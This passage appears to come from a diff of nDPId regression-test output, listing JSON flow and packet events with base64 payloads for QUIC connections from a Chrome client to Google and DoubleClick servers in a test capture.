Chrome\/92.0.4503.3 Windows NT 10.0; 
Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211714,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495213177,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1621495213177,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495213177,"pkt":"AAAAAAAAAAEAguyCCABFAAViV9lAAH4RzGmokEAFdZR1HuXQAbsFTiWSzf8AAB0IA03G00cjw3oAAEU0zpEREYtHc7fujisRl6Znia+7gzai8j7ZczB+a4Fyh+TnPaUk2oSi6h8oKvmj8nm70si+eFwEDb3FGL0hKLe6Q+jl35hlotxy8iz2MJJ+5JCecVMwWZMxK7aUkr6CaJRjwV5CAn1HRTHFLENZoJSkm3TO9IVstjeamQNND1C4DAYpZCGs04m3llenDZ\/2nNSsBRAqLZzlWTAHq1v+l8D6eE3YZLIpE9IrHycGHzViWxzXMi5yEaLjXG7\/gQk6gthaWh+hPIwJXrVk91+SXWpGfGKCCJtYXQe\/YYWnkpx+6u0xCJrCQ8l49V7DgS4W5guuiYck\/qFFKjVY3epgO0wSz+88pQcwVBobJMMXob69lIlXUiGJFQRdauvWOZcO\/L\/bUlflHcZ78ul\/rMPxQOiK365X16shY0I9m9aYK0vHWaLkQuxh6V0ZNOx509fgaFleyoO82d6dXpdyjt1rJM5gsDy8odRbJsobykqUplaDy3hP2x38Y9FzMJXsgHrai1zY6jqfTltw56ae\/7dvGxvxIVqCGlfOb2WjNFBF9\/LB8quZqSRVstaohJPnGpH7kVyAxNV1GTpVzDBbsxBWsfLG+Y7\/HImytHwpfxKeW3R2CAwJZXalypABlNkFfbhaeKzeql7ba3QOrsZyGQN7oaq3Rq3MAidC50gUVpQUByaEzPovR+3MmbtY6D5hLfj4TN1QByItBrTV\/XlHoWnrq\/DHJ4ZfBK4zLh4CNky8ZPsi936i8oU3g2YuXcCw0bkg8r1WCGjKJv+rdzI5ilHttek2MA7UUHCX5ICi6MB8S0s0wZiaZIPzdp7MYwsb4SgwIeWyJ2Ljz5IdSO5DxWBGvbcD9yl+3B5kIRZEtQmYdVCNieJFQkO6Us4QcNQDENcnaYpjFm\/ja8QmX5kP93aPcbMzm7nfVngHcDxxMgMXHIvkRkcvMcFjZJTHJgMU5LFMiXkxk9yZXV+hQMvPDgQgvkvRiW99Zwppx6x\/J1jFTyAohgUibbubWRLh2AAzOHgCz2ig8L5dy9K7xCzr2Xth\/JmLkyadTNCAUj3zbID3KEBBrhe454xxmAcXntpqr8uF6By1xuvy3exW+x5KB9i1AkZNkw8L1Op43WXQvcjQxCD2resMdq+jtdzg47L\/nQ0rZyzurYJ5tT1FAT7vCsWTCaOAsiVbUmvYE1uDvAMF9dJOXuF07HLb5+xhG1XKtBDaOfchBz4SNo7+00DbN4f8EY+FxpAZKzDK9+wj+5BzVIV5iHrtH90bEmt7eAhSPZN2MjbGFeQuyxUnOzpi\/795U5CmJvNPvJeaGfSzxnjjNqBTlb+T9XJYP1XT7ItPX5ZrMBWdJ6WInKgcMnSb2gw\/ieLuFgYlaEbn3nw2Vps5tGD919b7P4tV2g20hLlqcbNlmZvviPXipf7UweSGsqmu4S0nRNTJ61wiXAEF9d+3Zvcx2Lmv6aESs4Y631voX+3P0avN1
hltZJfMZHdpe6CRgj1Svw2JJxscjkxqwmbkwKldXEka+ot\/nIwrZRrkvverD8GcfNN7+gJOU8G7udQ0SKUSqI3DPyaSEb3IvIFaVDZ9Yz+HehsjvORG3zJlR2sfIgeQFPc8JjjX7ExTKf4uZOMgdLlrhCbrevhMCmiyKdBoPDkbnbi+c7aKMwm4qE+d0MtqO+rSQNHrDkMuYBESTLtHgl3RIqbnlrw9jNZIDyZG7lobW7PunDtEOt++PlNOlUQLnkW8gWBV5Vw3kQ50hMAtvSrX7RiOHr+5QxC\/dT+DEQPpku4M"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495213177,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495213177,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": 
{"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1621495215529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495215529,"pkt":"AAAAAAAAAAEAz315CABFAAViMsdAAH4RrXyokEAFJjkIeeQ9AbsFTmZNxf8AAB0IjZ\/i0MvbChYAAEU0Kuw5tIMbBep8zuXyFh\/CQw4vOa+ci4Wju1UfAkTGptA3xc23uwjbUED35IsAoT1c1vWSSpo1qoNbbUHZHartpYEZfoDzKqE0vmMKIRKBVz8p9UZnDMRqEXsN0o34IBa1u+5euUoZbZycVQbYG92X8tEJZUuLJQNPn7c9r8wIv6AfrnNfGtmki3v2aiKtRgXC1xcP0t\/BRF8i60R1e0\/SZfsdw6zmYKvXlb6meRkpRjolbih4G9oDqWoYvNI3EweYqf18S8s\/Xw6XLAvhzqAm+tqeiz6MfzwYKpLZdbP+6NSV4r3QlXmUMLI\/jOvlrh2GzjooQOG5gNIFQswRTZAMHIhQW9aX0Uhtiro\/cjYViGWEjpDbnwQi\/f7j2jafAUU5cUdCbYu6b8KUGI8MRCPg03ccQcmTOrbzbnsYFqQdZj3Oaj8oPF89fzvyu7ZZXic6q3INwPefXtAfiCceDxI7\/qwuFETUy4AU9YE7NPDCQfhrqLkBFnC7toLh5HLAWW1g0atzU1bIesqMtiWQNHpw6ilYy0P0Mml\/aLO3UASH2I3JzMRigR+aiKHJTQR\/7qGDxupagWFJiIqCs23iBup7jh85U3F
b7lC6WFTUyRRb69IuyN+9pN0xgb27sCXsGTU5vt5Xt2fpbYpKxX\/1dPfIOhbYqrmreZW09kjCedA6npXTYF2Ddu\/RWOqA5Xghl9jTCdqu6G0lVaF+jiT3YIuLbZJBefXJGeKLb1x3aZIAvordZ1rRKFBzQeFxpLpCEcohnAooS5OSu2JU2sjJcG1hFM+uZdDDe2S8bf3T5QmynqA8xZRBQc6ToAej8kU8ilRATsLphK1qTG\/Xz7HAZyaItvAVUzN6AWfe\/ptcf2FpFG2vlv3Nc0Z1o2VG2XhPHikHnP5H9GmBG4UvIGGheJm3UYfUhbFAGglGvMuSmmtTawrqACMC8ZL7+eywRfyAHmj2YOXc7igcQwM2+guxC97qeBDa6jfdMcnO1bIdOInih7VYVwp0RjaCC+xN+4sckLy91v+s6XAPniEeoaqNyxLx+zsyaYE3UO5mABu4ikw2PcrohSn8TsfYSVSIfgAf3oLeJLdeG1bAZzEHT\/leWIkPiXuKIU0JDfdwOyXbw0eJ5gIW1YwjA2PUC5WJteN3WrLf8QiM9XX\/Vnzx4CmxYhWKkYf1Lms81UyEAeHrhnSqRF4\/AUoTnEquDJImovna0QvL+UOKkZSGEQcIAHeGIN6oPpH2oVBuiKI+RIvF5od7\/HWj+KFD8j2HzDyGRrNak8i094ic3pv2Aa6Cy\/pDa+ri9GH9xvhxAT3g2LM5lW2jscCz4hr8ebvRoA6CFelcv8lyZNiluZSp4IXd3iBFb1h8XxnRIE94i5gNvCAP8AmDTshrDks9RUCJHBBxk2BRF01pWvmRN8ElDWQ00dKuNP43VwqvSZ80un7FDHwLTAiTkBxVuJmvxpNZO3IULz3xvMrJ4LFPOw4b5QWDjTvT9WZlVzi9JB\/dTancAXzz2jBSEE6cYk2wWN6hnWoimeysgkr9X+fnYznZZgkwvcmh6\/9WvRiIEio6b47a+d\/jSjLA0myTcbP51ndIrUeSm6xKHw48elW5Y4cR28w74dfEdPAhCtbHXOrPtvEYai9yvuuXjnL730N97zJThOnxmNOFbUdMaXOxLxlVUjy3ij38AxXx3a1TBJPSG++6lWuMKq5\/ce+1tui+NbZpHfRwO9L08Y5JbOLjByhgfrTXucF8VzVamDTbs+YZB0jFlVnPIVEyy9+ALSpx"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"static.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 
Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621494599158,"flow_last_seen":1621494601272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"static.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621494599158,"flow_last_seen":1621494601272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495262761,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1621495262761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495262761,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi\/CxAAH4RFtuokEAFcfqJ89i3AbsFTtpyxv8AAB0IHXYeW7GbkDwAAEU0cyqOvF0+zYFsDnDfj4qOegRwsK7IcQ46MH6ESOEovF69nrZGDb8lKJa9phduFdjj1k7I3mcSp4Fdox5WcOh+Uk0cZGV9fR8f0Ov6zlNHFynF0QcbyVzvpNKgfvb8FqOCsESZfnFqWIzSpjIdVFlIM3yGTD4xRjUDj1lkW0ZKllGp0aQyqCDwNkB2CqU7d1CD72aJJk6ATZ5lUmDmABhPxDZwNUEhhB0chtpF8CIMAjmAGtezZ9ouDWqW0JaiqP5zXHWUGVi+z7DqfOejMwTbhzyaKq6ngzgT0dc4966YOPgwrtJBmxim1uPIY6NQh1pHbxeKNPmo8hj2epIuOqIMeDvvwdBWt6aow69y0olkvm78WUKYVJpmQdNWK+CVp+C+UL6rmP4PjV2PigOvgJF4H38tUPzh65GKLY0ga\/03NYN\/hX0Wcjs3++ENhz4iZc9+ddaf4+4pRDlD6mkW65ATNBDIl52suxSlHN6HoynqSQY6oZvh++nCIkcG2JxZLMQ+T5nEGqj1gwsdkjle94+N9qANI7eVxlFdlntuY1+N6nk5tmMWoS\/R0WbGishHO3u6EhfykqYhHXVE59N0j+8mB5Q9+jh8ZGBt\/NKUSJCoOfZ7q1P7RZUejh0sTC65YebfomkMvboGteuZqOvQk5NXlMjaVzstVKAdT6JvVJwPuXaX88hdT72igJ3B2AlgfOI1RsIfOC7FpyGwZsX0av\/4fXJ6M0fmGATLs+LOo4iBiEQLKy0SWsPZJRQK5lZfzyxcJnxK7ZE2ACTGiwRfjEenycHidxzoFBMaR3paq4nM1XEwRUFSnVOIS589othRj472lPeD94UycNLpQ2JPV22UDBzaHVYUBpfKZcwtDascUlLDRFdo3SHiMcj7LOsEcBA5rulkUjsct5xpoNXx5B\/B2+m3KXZ00FyHamtLDjb7Po\/NZFWUfzZKuP1J\/hJm8Y99WXOElkvVgKn8xnPv5xhHavshHOttAR1+3H5+GmaPeuozfGPx1lOvgf97f4mVbgfunDuvEFxroS6I721gl6SvWtXHjyFJgJ0rIse8i6rRMQEoqSyvpxXclyfXHJ\/psvDdCdjhdvfvawUeb8D4u\/YZgul2vd1LWGMVgejI3sOxrePT+0ro1TsD+i0FH5MXZ8HvKJqB\/TAP3NBVUsk4YNndeX3dsYusAsf3qVTja16TeR5sSx\/+z+wRVz0lq7+OCWGxB8fNRGzmbAenuE9pS\/k2Ghc4RQd15aI2tGcDl7Yc7AtkS9GD1efiAgnbw\/ROL6uZMSwnSghBH++dvDhhHzVcSwVinWhVZeyH9xqIAn\/kFmpDD9BO5Dxi3TuuZgOY\/344mR5RfwsNXXiMndFoP9P9LnMgWMYN5fr9gxkoFqo96s9ZpovfzjCbESzAw1U1OTZa7Lw4eJBkreLeO8mAYYE+LTsjfFVvC6rsliMl92joXcb85RkQrnTc4eatNXHuuYwvm\
/Dr6O+7Ki2lIM4KcPnOCaF82c+PeLXbukzNmSEE3xvbz8wD0oxVX6eIeHO46TvhNZLEqAkuH1Fk8o2uNjEO5NN\/4T6X9Vx\/U7um8EnKZhp\/2mSs8gyRdalK6y\/u3KgU\/B7rnXkAB8DpUU3+R\/57bheJygo7zgvAvl0Dq3GraOVbrzJOvE85qkvo2AcnP0BV6NyqQmSYY0qcb0HX5twA+m3yMctUDJ6LSc5yUQvOXJncRh308497vAxONTdvp9+L4KLUhVLOh0L+x+RbMxsPkaaIn6POFyWoSrw0UDO8jroi049O"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495262761,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495262761,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495274945,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1621495274945,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495274945,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFcFAAH4RYDuokEAFgPgYAe4GAbsFToSxy\/8AAB0Ifg25e8dGmIEAAEU0NqVCEso1JyDnNa3XDGKdMJ5pTtV4nHofZAOnT1W+icJE5UY0TxDpCncREJLRH\/MPp7gaAubIBfy0WALhYVrmN\/h663kyTLy3uhofsu0TFEUnEWA+7HI+9JmK++aEmLEdeW6aDw9AD7oHPVlHJCcNoL6DRjUXNW6UwhifFO\/SGjrLRnHDVvcCbj383i203PYQCpsw1TTQLBNjWKjDQrTtIXrNx4V3oD1ei\/pnb3fnosV0RqaaT5EdA\/kbj3Qunb\/sj0TkZt219kbzZOuQOBwN97ZcgkkMco25yPaA5EE6pEJVtcYRhFHMV56RBuHnwBmJlpzat7EiWvBo17\/ZB4IV0XDC1EnRW7hVi1JGuDqv9wZh2naSmQwKBXisH1o8XxVgnKQThxyfXjf51QhQEpwyOBsPYA3sE80VUeUeF8YLmKJTmzCfKKen33pI74rSdatEVK\/riZ+k6Nx5Kv9ipxPveh\/OIKxrzg8fgwo6AtFiL7zpCKxJqETtW0Xa1iFaOYl7Z94ySPI0GrURbdOh17EWunCEGOaxFh5r1hyG20LK9uvCozSsHKRFAEEt8MTzWmZpHhUXoL4EBByiqvMPoD\/japbN
euqz+NZjcIAzLd5J7FIuRz17WAcrSLxduUWgAyBLIUVUSdw8wWeTbHOqa\/\/igt66GxhOxwnJA5q2ICcxEMzAYQknRdL5EwIR5G9hyMyaMEPKFuOhlR5K87PPV1OV5HTKBWuuQYcTSS2eMTcfL+LwS5zCy0DYr9XLJSQUeYXIgqrKv\/AHsPiF9PATspeWFZmZlm5GhZRglJ\/XKQG9XUxzfhDhP7y6m5R5\/xhVN6r91dLobOj3Hr6xnIg91wuWL0hkq29euOXZEAmYABS2BlN1JqxVxLeS1gYwKu8ZXJt94wPKz57Z6Ujs9YFRokZxZZDrRK8PX7BCPLDmcPiN5sNo15756ioaNcl4AX4v0EDRvDj3vYMKyFtQk58BOP\/uvTqrr6VjolIemKnqeJ\/sLePz3jY4p3NKgfKlmuliP81+pLj33EztpDUD3jYbL+MxSlNzeEnBCL7fOUVNAt\/9QxLRubiaTnxA0KR3eUjeh2rkb9KibkuXgAjUnvVEkK8aTr4Rjx98mH3whwCOTSwaDUKhnghn7bTjoDbh7vaeGMq9kSnvTDYXLIXgXgxvzNNlytJRA+bygeEgrquKFCSVVMG8J90v4BnHeAlvc4DYHIx2qJUsM8Lon6vK0e+65TgpTZKgASs0YbzDsVlALTwsNmrzZ9Z58wPBg9nT0ApUWY+Bvw20yzKGeOF5612Kox\/Kgw9M\/S4tLsnL4GEyFvrXltx2UtehZ+rnmLj2SsFbXxyq4ELJqWAjXNYab2bIqTsuwJ23bC\/hV\/lb65I48n7iyde1m67ozjQ5jCDaDVbnKLpriZVB6HPOjVFDe\/50gs0o2kVKPKEL+M24zTzWjn+gbaBdA9Y368TDtVgDjhk+0PWGeyRoCBcFbrGp3fBEtCJrqca3oiS4PMmd2dDVIxkr1nY+QSvCz7lxP9o7YB9OLPDxQmFWKlzHaowYyGDhQ4sUFdFiViXFRffQBO4GUEIqLifq0nd\/NakpsrzU0RqS5YG6uNuPjih1z5buPD7ehrJADajo5Dk+\/f+3lQNTFDfdZ3dd2xeZDkmq80JGAEpHPxGqurIijXd+lbTozqxxqwjhTNnVo2dxefRWbTd03ai6b\/hGokXWjfwn5SLA1W2FheoTwlBMf8\/nG5VrvvfTQYrAQiW0QQNyW1fjr5XCEJZ80G9Ts2SO"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495274945,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 
Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495274945,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 